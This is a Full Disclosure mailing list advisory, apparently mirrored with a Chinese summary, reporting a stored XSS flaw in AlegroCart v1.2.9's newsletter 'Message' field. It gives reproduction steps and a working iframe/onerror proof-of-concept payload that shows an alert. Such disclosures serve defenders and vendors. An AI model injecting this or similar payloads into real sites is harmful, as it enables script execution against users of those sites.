Stored XSS in "Message" Functionality - AlegroCartv1.2.9
AlegroCart v1.2.9 存在存储型 XSS 漏洞,攻击者可通过"Message"功能注入恶意脚本(如<iframe>标签),触发后显示文档域信息。该漏洞已在 Debian 12 环境下验证。 2025-4-24 03:14:29 Author: seclists.org(查看原文) 阅读量:4 收藏

fulldisclosure logo

Full Disclosure mailing list archives


From: Andrey Stoykov <mwebsec () gmail com>
Date: Wed, 23 Apr 2025 22:09:47 +0100

# Exploit Title: Stored XSS in "Message" Functionality - alegrocartv1.2.9
# Date: 04/2025
# Exploit Author: Andrey Stoykov
# Version: 1.2.9
# Tested on: Debian 12
# Blog: https://msecureltd.blogspot.com/

Stored XSS #1:

Steps to Reproduce:

1. Login as demonstrator account and visit "Customers" > "Newsletter"
2. In "Message" use the following XSS payload

<iframe srcdoc="<img src=x onerror=alert(document.domain)>"></iframe>
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/


Current thread:

  • Stored XSS in "Message" Functionality - AlegroCartv1.2.9 Andrey Stoykov (Apr 23)

文章来源: https://seclists.org/fulldisclosure/2025/Apr/21
如有侵权请联系:admin#unsafe.sh